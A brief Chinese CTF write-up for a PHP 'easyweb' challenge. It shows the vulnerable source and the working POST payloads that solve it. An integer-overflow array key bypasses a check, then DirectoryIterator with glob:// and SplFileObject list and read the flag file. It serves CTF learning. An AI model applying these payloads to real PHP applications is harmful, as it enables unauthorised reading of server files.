get传入?source便可以获得网站源码
<?php error_reporting(0); if(isset($_GET['source'])){ highlight_file(__FILE__); echo "\$flag_filename = 'flag'.md5(???).'php';"; //这里可以看到flag.php是由flag+md5.php组成的 die(); } if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c'])){ $c = $_POST['c']; $count[++$c] = 1; //数组自增后进行赋值,我们让数组键溢出,导致自增后达到溢出无法进行赋值 if($count[] = 1) { $count[++$c] = 1; print_r($count); die(); }else{ $a = $_POST['a']; $b = $_POST['b']; echo new $a($b); } }
这里的话传入c=9223372036854775806从而使得php数组键溢出,然后在echo new $a($b)这里的话可以使用php原生类进行命令执行
找到flag.php:&a=DirectoryIterator&b=glob://flag[a-z0-9]*.php&c=9223372036854775806
读取flag:
a=SplFileObject&b=flag56ea8b83122449e814e0fd7bfb5f220a.php&c=9223372036854775806
标签:9223372036854775806,王杯,flag,CTF,easyweb,php From: https://www.cnblogs.com/kode00/p/17750349.html